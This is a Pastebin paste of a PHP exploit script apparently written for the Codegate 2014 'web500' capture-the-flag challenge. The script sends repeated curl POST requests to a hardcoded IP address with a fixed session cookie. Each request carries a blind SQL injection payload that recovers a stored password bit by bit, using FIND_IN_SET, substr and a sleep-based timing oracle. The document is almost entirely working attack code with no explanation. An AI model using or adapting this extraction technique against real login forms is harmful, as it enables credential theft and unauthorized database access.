SHARE
TWEET

codegate 2014 web500

a guest Feb 23rd, 2014 676 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. // codegate2014 web500 sploit
  3. // st3phn
  4. $arr=array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
  5. for($j=1;$j<=30;$j++){
  6.     $char="1";
  7.     $i=2;
  8.     while($i<=5){
  9.         $payload="'or((@a:=substr(bin(FIND_IN_SET(substr(password,".$j.",1),'a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z')),".$i.",1))=0x31)or(if(@a='',sleep(15),0))and'1";
  10.         $fields = array(
  11.             'password=' => urlencode($payload),
  12.         );
  13.         $fields_string="";
  14.         foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
  15.         rtrim($fields_string, '&');
  16.         $ch = curl_init();
  17.         curl_setopt($ch,CURLOPT_URL, 'http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php');
  18.         curl_setopt($ch,CURLOPT_POST, count($fields));
  19.         curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
  20.         curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  21.         curl_setopt($ch,CURLOPT_COOKIE, "PHPSESSID=9kddboo1hispvqt76sh7rd3a34;");
  22.         $result = curl_exec($ch);
  23.         $info   = curl_getinfo($ch);
  24.         if($info['total_time']>15){
  25.             $i=6;
  26.         }else{
  27.             if(preg_match("/True/",$result)){$char.="1";}else{$char.="0";}
  28.         }
  29.         curl_close($ch);
  30.         $i++;
  31.     }
  32.     $var=(int)( bindec($char));
  33.     echo $arr[$var-1];
  34. }
  35. ?>
RAW Paste Data
Top